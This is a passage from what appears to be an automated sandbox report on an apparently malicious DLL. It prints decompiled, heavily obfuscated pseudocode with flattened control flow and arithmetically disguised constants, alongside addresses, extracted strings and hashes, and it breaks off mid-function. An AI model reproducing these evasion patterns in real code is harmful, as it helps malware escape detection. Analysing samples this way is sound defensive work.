				_v52 = 0xa82;
				_t165 = 0x49;
				_v52 = _v52 / _t165;
				_v52 = _v52 + 0x548f;
				_v52 = _v52 ^ 0x000056ef;
				_v60 = 0x147a;
				_v60 = _v60 + 0xffff5465;
				_v60 = _v60 + 0x4912;
				_v60 = _v60 + 0x75b6;
				_v60 = _v60 ^ 0x00000d5b;
				_v12 = 0x2808;
				_t166 = 0x3c;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x00007e81;
				_v16 = 0x677c;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x00000f03;
				_v20 = 0x40ea;
				_t73 =  &_v20; // 0x40ea
				_t167 = 7;
				_v20 =  *_t73 / _t167;
				_v20 = _v20 ^ 0x0000696b;
				_v8 = 0x2aca;
				_v8 = _v8 ^ 0x5bcab796;
				_v8 = _v8 ^ 0x5bca9ee4;
				_v40 = 0x8019;
				_v40 = _v40 >> 1;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x00802c80;
				_v44 = 0xa509;
				_v44 = _v44 | 0xfb24deb0;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x93fe8f44;
				_v48 = 0x64c2;
				_v48 = _v48 + 0xffffc005;
				_v48 = _v48 | 0x8cdd04ab;
				_v48 = _v48 ^ 0x8cdd37a9;
				_t168 = _v4;
				while(_t148 != 0x109ed35) {
					if(_t148 == 0xfead4ff) {
						_t148 = 0x2ad569f8;
						continue;
					} else {
						if(_t148 == 0x1649e19d) {
							_t114 =  &_v20; // 0x40ea
							E10017A72(_a20, _v56, 1, 1, _v52, _v60, _v12, _t148, _a8, _v16,  *_t114, _v4);
							_t172 =  &(_t172[0xa]);
							_t148 = 0x109ed35;
							_t169 =  !=  ? 1 : _t169;
							continue;
						} else {
							if(_t148 == 0x2ad569f8) {
								_t142 = E10014DBD();
								_t168 = _t142;
								if(_t142 != 0xffffffff) {
									_t148 = 0x2e3949fa;
									continue;
								}
							} else {
								if(_t148 != 0x2e3949fa) {
									L13:
									if(_t148 != 0x14320148) {
										continue;
									}
								} else {
									_t111 =  &_v28; // 0x40ea
									_t145 = E1001D472(_t168,  *_t111, _v32, _v36,  &_v4);
									_t172 =  &(_t172[3]);
									if(_t145 != 0) {
										_t148 = 0x1649e19d;
										continue;
									}
								}
							}
						}
					}
					return _t169;
				}
				E100078F0(_v4, _v8, _v40, _v44, _v48);
				_t172 =  &(_t172[3]);
				_t148 = 0x14320148;
				goto L13;
			}

0x10004be5
0x10004bec
0x10004bed
0x10004bf1
0x10004bf5
0x10004bf9
0x10004bfa
0x10004bfb
0x10004c00
0x10004c08
0x10004c0b
0x10004c15
0x10004c1d
0x10004c1f
0x10004c27
0x10004c33
0x10004c36
0x10004c3a
0x10004c42
0x10004c4a
0x10004c52
0x10004c5a
0x10004c62
0x10004c6a
0x10004c72
0x10004c7f
0x10004c8b
0x10004c8f
0x10004c97
0x10004c9f
0x10004cab
0x10004cb0
0x10004cb6
0x10004cbe
0x10004cc6
0x10004cce
0x10004cd6
0x10004cde
0x10004ce6
0x10004cee
0x10004cfa
0x10004cff
0x10004d05
0x10004d0d
0x10004d15
0x10004d1a
0x10004d22
0x10004d2a
0x10004d2e
0x10004d31
0x10004d35
0x10004d3d
0x10004d45
0x10004d4d
0x10004d55
0x10004d5d
0x10004d61
0x10004d66
0x10004d6e
0x10004d7b
0x10004d83
0x10004d88
0x10004d90
0x10004d98
0x10004da0
0x10004da8
0x10004db0
0x10004db4
0x10004dc6
0x10004e60
0x00000000
0x10004dcc
0x10004dce
0x10004e26
0x10004e49
0x10004e4e
0x10004e51
0x10004e58
0x00000000
0x10004dd0
0x10004dd6
0x10004e0f
0x10004e14
0x10004e19
0x10004e1b
0x00000000
0x10004e1b
0x10004dd8
0x10004dde
0x10004e8b
0x10004e91
0x00000000
0x00000000
0x10004de4
0x10004df3
0x10004df7
0x10004dfc
0x10004e01
0x10004e07
0x00000000
0x10004e07
0x10004e01
0x10004dde
0x10004dd6
0x10004dce
0x10004ea0
0x10004ea0
0x10004e7e
0x10004e83
0x10004e86
0x00000000

Strings

|g, xrefs: 10004D0D
Xs, xrefs: 10004C15
V, xrefs: 10004CBE
@<, xrefs: 10004D2A
[, xrefs: 10004CE6
ki, xrefs: 10004D35

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Xs$[$ki$|g$@<$V
API String ID: 0-1782315456
Opcode ID: 0f14377d98c16b5985b99b724adaf78676166183dbeb8b997100305714497c0a
Instruction ID: d5753dc0bbcc3aea306371c6b81f33b505aaf0871162b6c422c34f7178ca26c7
Opcode Fuzzy Hash: 0f14377d98c16b5985b99b724adaf78676166183dbeb8b997100305714497c0a
Instruction Fuzzy Hash: 2C6155B1509340AFE794CF21C88581FBBF2FBD4798F414A1DF695462A0C775DA098B87

Uniqueness

Uniqueness Score: -1.00%

Function 1001231B, Relevance: 6.6, Strings: 5, Instructions: 327
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001231B(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t296;
				void* _t321;
				intOrPtr _t325;
				void* _t327;
				short _t328;
				void* _t334;
				signed int _t338;
				signed int _t339;
				void* _t341;
				intOrPtr* _t377;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t390;
				signed int _t391;
				signed int _t394;
				signed int* _t396;
				void* _t398;

				_push(_a12);
				_t377 = _a4;
				_push(_a8);
				_push(_t377);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t296);
				_v8 = _v8 & 0x00000000;
				_t396 =  &(( &_v124)[5]);
				_v96 = 0x1023;
				_v96 = _v96 ^ 0xe47dc4fc;
				_t341 = 0x27600fdb;
				_v96 = _v96 ^ 0x32abab6c;
				_v96 = _v96 | 0x6d93312b;
				_v96 = _v96 ^ 0xffd78252;
				_v16 = 0xdaf7;
				_t381 = 0x16;
				_v16 = _v16 / _t381;
				_v16 = _v16 ^ 0x000001c4;
				_v20 = 0x6395;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x18e533fd;
				_v88 = 0xa972;
				_v88 = _v88 | 0xad5f380f;
				_t382 = 0x43;
				_v88 = _v88 / _t382;
				_v88 = _v88 * 0x65;
				_v88 = _v88 ^ 0x055ac7b0;
				_v44 = 0xf64e;
				_v44 = _v44 ^ 0xc329889b;
				_v44 = _v44 ^ 0xc3290878;
				_v120 = 0x240c;
				_v120 = _v120 ^ 0x7b0f575c;
				_v120 = _v120 << 0xd;
				_v120 = _v120 + 0x9190;
				_v120 = _v120 ^ 0xee6af427;
				_v68 = 0x2382;
				_v68 = _v68 ^ 0xaf4a09f1;
				_v68 = _v68 + 0xffff93b5;
				_v68 = _v68 ^ 0xaf49ee02;
				_v124 = 0xa6c0;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 << 0xf;
				_v124 = _v124 * 0x50;
				_v124 = _v124 ^ 0x01900d65;
				_v48 = 0x59b;
				_v48 = _v48 | 0x1d932e17;
				_v48 = _v48 ^ 0x1d93434e;
				_v32 = 0x7dc;
				_v32 = _v32 | 0x7a0a60f4;
				_v32 = _v32 ^ 0x7a0a2147;
				_v36 = 0xa0ae;
				_v36 = _v36 | 0x35bc5344;
				_v36 = _v36 ^ 0x35bce77d;
				_v40 = 0xf45a;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x00007c19;
				_v24 = 0xd9df;
				_v24 = _v24 + 0x4204;
				_v24 = _v24 ^ 0x00011e54;
				_v28 = 0xf9ca;
				_v28 = _v28 ^ 0x4b2056fe;
				_v28 = _v28 ^ 0x4b20b363;
				_v112 = 0xa35c;
				_t383 = 7;
				_v112 = _v112 / _t383;
				_v112 = _v112 >> 8;
				_v112 = _v112 ^ 0x00007415;
				_v100 = 0x2d35;
				_v100 = _v100 | 0x4fbfcbdf;
				_v100 = _v100 + 0xffffcb51;
				_v100 = _v100 ^ 0x4fbfa459;
				_v104 = 0x199f;
				_v104 = _v104 | 0xa6a9e361;
				_v104 = _v104 ^ 0x0fa1695b;
				_t384 = 0x70;
				_v104 = _v104 * 0x34;
				_v104 = _v104 ^ 0x55bdfdea;
				_v108 = 0x6dac;
				_v108 = _v108 + 0x7618;
				_v108 = _v108 | 0xd437a5be;
				_v108 = _v108 >> 5;
				_v108 = _v108 ^ 0x06a1e076;
				_v52 = 0xb587;
				_v52 = _v52 / _t384;
				_v52 = _v52 | 0x698df789;
				_v52 = _v52 ^ 0x698dbdb0;
				_v56 = 0xcc44;
				_t385 = 0x54;
				_v56 = _v56 / _t385;
				_v56 = _v56 + 0xffff840a;
				_v56 = _v56 ^ 0xffffb5b3;
				_v92 = 0x53df;
				_t386 = 0x38;
				_v92 = _v92 * 0x2b;
				_v92 = _v92 ^ 0x72368f4f;
				_v92 = _v92 * 0x5f;
				_v92 = _v92 ^ 0x6300adc9;
				_v60 = 0xeb4;
				_v60 = _v60 ^ 0x82e65f12;
				_v60 = _v60 * 0x12;
				_v60 = _v60 ^ 0x3431ffe0;
				_v76 = 0x9ea1;
				_v76 = _v76 / _t386;
				_v76 = _v76 << 9;
				_v76 = _v76 | 0x56c1a970;
				_v76 = _v76 ^ 0x56c5f8a5;
				_v80 = 0xe36f;
				_t387 = 0x71;
				_v80 = _v80 / _t387;
				_v80 = _v80 >> 0xa;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 ^ 0x00002ab6;
				_v12 = 0xbe7b;
				_v12 = _v12 ^ 0xb73b4484;
				_v12 = _v12 ^ 0xb73bd21d;
				_v84 = 0x2f05;
				_v84 = _v84 ^ 0x486d0961;
				_v84 = _v84 * 0x18;
				_v84 = _v84 ^ 0xccd4c0a7;
				_v84 = _v84 ^ 0x06ef1f50;
				_v72 = 0xb051;
				_v72 = _v72 | 0x44f81078;
				_t394 = _v4;
				_t338 = _v4;
				_v72 = _v72 * 0x1b;
				_v72 = _v72 ^ 0x463a9cc3;
				_v116 = 0x904e;
				_v116 = _v116 >> 6;
				_v116 = _v116 | 0x00eb6e86;
				_v116 = _v116 >> 8;
				_v116 = _v116 ^ 0x0000eb6e;
				_v64 = 0x30db;
				_v64 = _v64 + 0xffffb1c5;
				_v64 = _v64 ^ 0x9ee5eb39;
				_v64 = _v64 ^ 0x611a0999;
				while(1) {
					_t321 = 0x5942909;
					while(1) {
						L2:
						_t398 = _t341 - 0x19684f4e;
						if(_t398 > 0) {
							break;
						}
						if(_t398 == 0) {
							E100091CD(_v52, _v56, _v92, _t394, _v60);
							_t396 =  &(_t396[3]);
							_t341 = 0x203b69b2;
							while(1) {
								_t321 = 0x5942909;
								goto L2;
							}
						} else {
							if(_t341 == 0x45bbbee) {
								 *(_t377 + 4) = _v64;
								_t325 = E1000C6EF(_t377 + 4, _v96, _v100, _v104, _t338 - 1, _t394, _v108);
								_t396 =  &(_t396[5]);
								 *_t377 = _t325;
								_t341 = 0x19684f4e;
								while(1) {
									_t321 = 0x5942909;
									goto L2;
								}
							} else {
								if(_t341 == _t321) {
									_t338 = _v116;
									_t379 = _v8;
									if(_t379 != 0) {
										do {
											E10015891(_t379 + 0x2c, _t338 * 2 + _t394, _v32, _v36, _v40);
											_t327 = E1001BBAB(_v24, _v28, _t379 + 0x2c, _v112);
											_t396 =  &(_t396[5]);
											_t339 = _t338 + _t327;
											_t328 = 0x2c;
											 *((short*)(_t394 + _t339 * 2)) = _t328;
											_t338 = _t339 + 1;
											_t379 =  *((intOrPtr*)(_t379 + 0x1c));
										} while (_t379 != 0);
										_t321 = 0x5942909;
									}
									_t391 = _v4;
									_t341 = 0x45bbbee;
									goto L13;
								} else {
									if(_t341 == 0xb31c45f) {
										_t391 = _v72;
										_t380 = _v8;
										_v4 = _t391;
										if(_t380 != 0) {
											do {
												_t334 = E1001BBAB(_v44, _v120, _t380 + 0x2c, _v68);
												_t380 =  *((intOrPtr*)(_t380 + 0x1c));
												_t391 = _t391 + 1 + _t334;
											} while (_t380 != 0);
											_v4 = _t391;
											_t321 = 0x5942909;
										}
										_t341 = 0xd80ae87;
										L13:
										_t377 = _a4;
										continue;
									} else {
										if(_t341 == 0xd80ae87) {
											_push(_t341);
											_t394 = E100157E8(_t391 + _t391);
											_t321 = 0x5942909;
											_t341 =  !=  ? 0x5942909 : 0x203b69b2;
											continue;
										}
									}
								}
							}
						}
						L29:
						if(_t341 != 0x178c149f) {
							continue;
						}
						return 0 |  *_t377 != 0x00000000;
					}
					if(_t341 == 0x203b69b2) {
						_t378 = _v8;
						if(_t378 != 0) {
							do {
								_t390 =  *(_t378 + 0x1c);
								E100091CD(_v76, _v80, _v12, _t378, _v84);
								_t396 =  &(_t396[3]);
								_t378 = _t390;
							} while (_t390 != 0);
							_t321 = 0x5942909;
						}
						_t377 = _a4;
						_t341 = 0x178c149f;
					} else {
						if(_t341 == 0x27600fdb) {
							_t341 = 0x2d4988fb;
							goto L2;
						} else {
							if(_t341 == 0x2d4988fb) {
								E100142E2( &_v8, E10005EB9, _v20, _v88);
								_t396 =  &(_t396[3]);
								_t341 = 0xb31c45f;
								continue;
							}
						}
					}
					goto L29;
				}
			}

0x10012322
0x10012329
0x10012330
0x10012337
0x10012338
0x10012339
0x1001233a
0x1001233f
0x10012347
0x1001234a
0x10012354
0x1001235c
0x10012361
0x10012369
0x10012371
0x10012379
0x10012387
0x1001238c
0x10012395
0x100123a0
0x100123a8
0x100123ad
0x100123b5
0x100123bd
0x100123c9
0x100123cc
0x100123d5
0x100123d9
0x100123e1
0x100123e9
0x100123f1
0x100123f9
0x10012401
0x10012409
0x1001240e
0x10012416
0x1001241e
0x10012426
0x1001242e
0x10012436
0x1001243e
0x10012446
0x1001244b
0x10012455
0x10012459
0x10012461
0x10012469
0x10012471
0x10012479
0x10012481
0x10012489
0x10012491
0x10012499
0x100124a1
0x100124a9
0x100124b1
0x100124b6
0x100124be
0x100124c6
0x100124ce
0x100124d6
0x100124de
0x100124e6
0x100124ee
0x10012506
0x1001250b
0x10012511
0x10012516
0x1001251e
0x10012526
0x1001252e
0x10012536
0x1001253e
0x10012546
0x1001254e
0x1001255b
0x1001255e
0x10012562
0x1001256a
0x10012572
0x1001257a
0x10012582
0x10012587
0x1001258f
0x1001259f
0x100125a3
0x100125ab
0x100125b3
0x100125bf
0x100125c4
0x100125ca
0x100125d2
0x100125da
0x100125e7
0x100125ea
0x100125ee
0x100125fb
0x100125ff
0x10012607
0x1001260f
0x1001261c
0x10012620
0x10012628
0x10012638
0x1001263c
0x10012641
0x10012649
0x10012651
0x1001265d
0x10012660
0x10012664
0x10012669
0x1001266e
0x10012676
0x10012681
0x1001268c
0x10012697
0x1001269f
0x100126ac
0x100126b0
0x100126b8
0x100126c0
0x100126c8
0x100126d5
0x100126dc
0x100126ea
0x100126ee
0x100126f6
0x100126fe
0x10012703
0x1001270b
0x10012710
0x10012718
0x10012720
0x10012728
0x10012730
0x10012738
0x10012738
0x1001273d
0x1001273d
0x1001273d
0x10012743
0x00000000
0x00000000
0x10012749
0x100128a1
0x100128a6
0x100128a9
0x10012738
0x10012738
0x00000000
0x10012738
0x1001274f
0x10012755
0x10012869
0x1001287c
0x10012881
0x10012884
0x10012886
0x10012738
0x10012738
0x00000000
0x10012738
0x1001275b
0x1001275d
0x100127f0
0x100127f4
0x100127fd
0x100127ff
0x10012819
0x10012831
0x10012836
0x10012839
0x1001283d
0x1001283e
0x10012843
0x10012844
0x10012847
0x1001284b
0x1001284b
0x10012850
0x10012857
0x00000000
0x10012763
0x10012769
0x1001279c
0x100127a0
0x100127a7
0x100127b0
0x100127b2
0x100127c2
0x100127c7
0x100127cc
0x100127cf
0x100127d3
0x100127da
0x100127da
0x100127df
0x100127e4
0x100127e4
0x00000000
0x1001276b
0x10012771
0x1001277f
0x10012788
0x1001278a
0x10012797
0x00000000
0x10012797
0x10012771
0x10012769
0x1001275d
0x10012755
0x10012943
0x10012950
0x00000000
0x00000000
0x10012964
0x10012964
0x100128b9
0x10012902
0x1001290b
0x1001290d
0x10012911
0x10012924
0x10012929
0x1001292c
0x1001292e
0x10012932
0x10012932
0x10012937
0x1001293e
0x100128bb
0x100128c1
0x100128f8
0x00000000
0x100128c3
0x100128c9
0x100128e6
0x100128eb
0x100128ee
0x00000000
0x100128ee
0x100128c9
0x100128c1
0x00000000
0x100128b9

Strings

o, xrefs: 10012651
G!z, xrefs: 10012489
5-, xrefs: 1001251E
amH, xrefs: 1001269F
n, xrefs: 10012710

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5-$G!z$amH$n$o
API String ID: 0-2418732634
Opcode ID: 3887bab40c44b1641d7bbcfab6a6f4e19126a941134cafb96a2f4f2f1bff6032
Instruction ID: 6f407b80c570a864ccd2820a3afddbd72b69261bff4ce0457850b771c8ca1b73
Opcode Fuzzy Hash: 3887bab40c44b1641d7bbcfab6a6f4e19126a941134cafb96a2f4f2f1bff6032
Instruction Fuzzy Hash: 7DF141754083818FD368CF25C58664FBBE1FBC4758F60890DF29A9A260CB75D989CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1001C04C, Relevance: 6.4, Strings: 5, Instructions: 182
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1001C04C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t150;
				void* _t174;
				void* _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a8);
				_t213 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t150);
				_v80 = 0xc784;
				_t217 =  &(( &_v112)[4]);
				_v80 = _v80 << 4;
				_t214 = 0;
				_t189 = 0x33fb58ad;
				_t181 = 0x6b;
				_v80 = _v80 * 0x28;
				_v80 = _v80 ^ 0x01f2d8b7;
				_v84 = 0x50fb;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 + 0x937e;
				_v84 = _v84 ^ 0x0000fdde;
				_v56 = 0x327d;
				_v56 = _v56 + 0xffffdcf3;
				_v56 = _v56 ^ 0x00004b6f;
				_v88 = 0x146d;
				_v88 = _v88 ^ 0x8349746f;
				_v88 = _v88 / _t181;
				_v88 = _v88 ^ 0x013a5398;
				_v60 = 0xe2fe;
				_t182 = 0x25;
				_v60 = _v60 * 0x79;
				_v60 = _v60 ^ 0x006b2efa;
				_v64 = 0xc02b;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x00002cf4;
				_v92 = 0x8680;
				_v92 = _v92 * 0x7e;
				_v92 = _v92 + 0xffff14d8;
				_v92 = _v92 ^ 0x004119fe;
				_v96 = 0x22ae;
				_v96 = _v96 * 0x57;
				_v96 = _v96 * 0x15;
				_v96 = _v96 ^ 0x00f7010a;
				_v68 = 0x9e2a;
				_v68 = _v68 << 0xa;
				_v68 = _v68 ^ 0x0278df5a;
				_v100 = 0x70f1;
				_v100 = _v100 + 0x9f07;
				_v100 = _v100 << 7;
				_v100 = _v100 ^ 0x0087eaa7;
				_v72 = 0xae27;
				_v72 = _v72 + 0xffff81b6;
				_v72 = _v72 ^ 0x00001dbd;
				_v76 = 0xeb69;
				_v76 = _v76 + 0xe753;
				_v76 = _v76 / _t182;
				_v76 = _v76 ^ 0x00001cc5;
				_v104 = 0x4553;
				_v104 = _v104 + 0xffffebb9;
				_t183 = 0x7e;
				_v104 = _v104 / _t183;
				_t184 = 0xe;
				_v104 = _v104 / _t184;
				_v104 = _v104 ^ 0x00003b66;
				_v108 = 0x5045;
				_t185 = 0x38;
				_v108 = _v108 / _t185;
				_t186 = 0x45;
				_v108 = _v108 * 0x58;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 ^ 0x002412f1;
				_v112 = 0x2d31;
				_v112 = _v112 / _t186;
				_v112 = _v112 ^ 0x7267b250;
				_v112 = _v112 + 0xd72;
				_v112 = _v112 ^ 0x7267a792;
				while(_t189 != 0x8879467) {
					if(_t189 == 0x1932f021) {
						_t174 = E1001D290(_v88, _v60, _v64, _t213, _v92,  &_v52);
						_t217 =  &(_t217[4]);
						__eflags = _t174;
						if(__eflags != 0) {
							_t189 = 0x36f0c2c4;
							continue;
						}
					} else {
						if(_t189 == 0x33be0ba1) {
							_t147 = _t213 + 8; // 0x3ba4bc1b
							__eflags = E10009899(_t147, _v76, __eflags,  &_v52, _v104, _v108, _v112);
							_t214 =  !=  ? 1 : _t214;
							__eflags = _t214;
						} else {
							if(_t189 == 0x33fb58ad) {
								_t189 = 0x8879467;
								continue;
							} else {
								if(_t189 != 0x36f0c2c4) {
									L12:
									__eflags = _t189 - 0x2249cb7b;
									if(__eflags != 0) {
										continue;
									} else {
									}
								} else {
									_t130 = _t213 + 4; // 0x3ba4bc17
									_t180 = E1001D290(_v96, _v68, _v100, _t130, _v72,  &_v52);
									_t217 =  &(_t217[4]);
									if(_t180 != 0) {
										_t189 = 0x33be0ba1;
										continue;
									}
								}
							}
						}
					}
					return _t214;
				}
				E1001F3E9(_v80, _v84, _v56, _a4,  &_v52);
				_t217 =  &(_t217[3]);
				_t189 = 0x1932f021;
				goto L12;
			}

0x1001c053
0x1001c05a
0x1001c05c
0x1001c063
0x1001c064
0x1001c065
0x1001c06a
0x1001c072
0x1001c075
0x1001c081
0x1001c083
0x1001c08a
0x1001c08d
0x1001c091
0x1001c099
0x1001c0a1
0x1001c0a6
0x1001c0ae
0x1001c0b6
0x1001c0be
0x1001c0c6
0x1001c0ce
0x1001c0d6
0x1001c0e6
0x1001c0ea
0x1001c0f2
0x1001c0ff
0x1001c102
0x1001c106
0x1001c10e
0x1001c116
0x1001c11b
0x1001c123
0x1001c130
0x1001c134
0x1001c13c
0x1001c144
0x1001c151
0x1001c15a
0x1001c15e
0x1001c166
0x1001c16e
0x1001c173
0x1001c17b
0x1001c183
0x1001c18b
0x1001c190
0x1001c198
0x1001c1a0
0x1001c1a8
0x1001c1b0
0x1001c1b8
0x1001c1c8
0x1001c1cc
0x1001c1d4
0x1001c1dc
0x1001c1e8
0x1001c1ed
0x1001c1f7
0x1001c1fc
0x1001c202
0x1001c20f
0x1001c21b
0x1001c220
0x1001c22b
0x1001c22c
0x1001c235
0x1001c239
0x1001c241
0x1001c254
0x1001c258
0x1001c260
0x1001c268
0x1001c270
0x1001c27a
0x1001c2db
0x1001c2e0
0x1001c2e3
0x1001c2e5
0x1001c2e7
0x00000000
0x1001c2e7
0x1001c27c
0x1001c27e
0x1001c32d
0x1001c344
0x1001c346
0x1001c346
0x1001c284
0x1001c28a
0x1001c2c1
0x00000000
0x1001c28c
0x1001c292
0x1001c313
0x1001c313
0x1001c319
0x00000000
0x00000000
0x1001c31f
0x1001c294
0x1001c29d
0x1001c2ad
0x1001c2b2
0x1001c2b7
0x1001c2bd
0x00000000
0x1001c2bd
0x1001c2b7
0x1001c292
0x1001c28a
0x1001c27e
0x1001c352
0x1001c352
0x1001c306
0x1001c30b
0x1001c30e
0x00000000

Strings

EP, xrefs: 1001C20F
f;, xrefs: 1001C202
r, xrefs: 1001C260
oK, xrefs: 1001C0C6
S, xrefs: 1001C1B8

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: EP$S$f;$oK$r
API String ID: 0-800867564
Opcode ID: 720cd8e89fa945350f7bf224007334e3e1789cc6eb53dad625d3cb73989cf900
Instruction ID: d204fd09f4313df74329eeb12e1bf2a89ad17ecc6e86b591d2f7d2102d956d92
Opcode Fuzzy Hash: 720cd8e89fa945350f7bf224007334e3e1789cc6eb53dad625d3cb73989cf900
Instruction Fuzzy Hash: BB8152715083419FE354CF65C88581FBBF5FBC9348F50891EF5998A2A0D3B6CA898B42

Uniqueness

Uniqueness Score: -1.00%

Function 1001CDCC, Relevance: 6.4, Strings: 5, Instructions: 160
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E1001CDCC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a24) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t139;
				signed int _t152;
				void* _t157;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				void* _t175;
				signed int* _t178;

				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t139);
				_v28 = 0x325f;
				_t178 =  &(( &_v56)[8]);
				_v28 = _v28 + 0xffff4d87;
				_v28 = _v28 + 0xffff7eee;
				_t175 = 0;
				_v28 = _v28 ^ 0xfffeea83;
				_t157 = 0x2e625de7;
				_v16 = 0x7ea1;
				_t171 = 0x4c;
				_v16 = _v16 * 0x50;
				_v16 = _v16 ^ 0x0027b5c0;
				_v48 = 0xb396;
				_v48 = _v48 << 2;
				_v48 = _v48 + 0xffffd4e6;
				_v48 = _v48 * 0x23;
				_v48 = _v48 ^ 0x005c32d3;
				_v52 = 0x4c8e;
				_v52 = _v52 >> 4;
				_v52 = _v52 + 0xffff8362;
				_v52 = _v52 | 0xaf524c7b;
				_v52 = _v52 ^ 0xffffb92c;
				_v20 = 0xd7f5;
				_v20 = _v20 | 0xc3990154;
				_v20 = _v20 ^ 0xc3999ac5;
				_v56 = 0x9c91;
				_v56 = _v56 | 0x8c86dbc7;
				_v56 = _v56 + 0xf56e;
				_v56 = _v56 ^ 0x560a30e6;
				_v56 = _v56 ^ 0xda8da389;
				_v12 = 0xdf7a;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0x0001eefc;
				_v24 = 0x3c6;
				_v24 = _v24 | 0x5cdca8ce;
				_v24 = _v24 + 0x7ec4;
				_v24 = _v24 ^ 0x5cdd52aa;
				_v4 = 0xc884;
				_v4 = _v4 | 0x864be180;
				_v4 = _v4 ^ 0x864b8e34;
				_v32 = 0xecf0;
				_v32 = _v32 / _t171;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x00000683;
				_v8 = 0xa81d;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x05408dca;
				_v36 = 0x9864;
				_t172 = 0x59;
				_v36 = _v36 / _t172;
				_v36 = _v36 ^ 0xaaa5894b;
				_v36 = _v36 + 0xffff7394;
				_v36 = _v36 ^ 0xaaa4dea0;
				_v40 = 0xd8eb;
				_v40 = _v40 + 0x511b;
				_v40 = _v40 >> 3;
				_v40 = _v40 + 0xffff6e25;
				_v40 = _v40 ^ 0xffffcd83;
				_v44 = 0x92f;
				_v44 = _v44 ^ 0xfb5f1719;
				_v44 = _v44 << 3;
				_t173 = 0x32;
				_t174 = _v4;
				_v44 = _v44 / _t173;
				_v44 = _v44 ^ 0x0461405b;
				do {
					while(_t157 != 0xc7aef4e) {
						if(_t157 == 0x1f37240b) {
							_t152 = E1000CF11(0, _a16, _v28, 0xffffffff, _v16, _t157, _v48, 0, _v52, _a8, _v20, _v56);
							_t174 = _t152;
							_t178 =  &(_t178[0xa]);
							if(_t152 != 0) {
								_t157 = 0xc7aef4e;
								continue;
							}
						} else {
							if(_t157 == 0x2e625de7) {
								_t157 = 0x1f37240b;
								continue;
							} else {
								if(_t157 != 0x32a206ac) {
									goto L13;
								} else {
									E1000CF11(_t174, _a16, _v4, 0xffffffff, _v32, _t157, _v8, _t175, _v36, _a8, _v40, _v44);
								}
							}
						}
						L6:
						return _t175;
					}
					_push(_t157);
					_t175 = E100157E8(_t174 + _t174);
					if(_t175 == 0) {
						_t157 = 0x3ab8f213;
						goto L13;
					} else {
						_t157 = 0x32a206ac;
						continue;
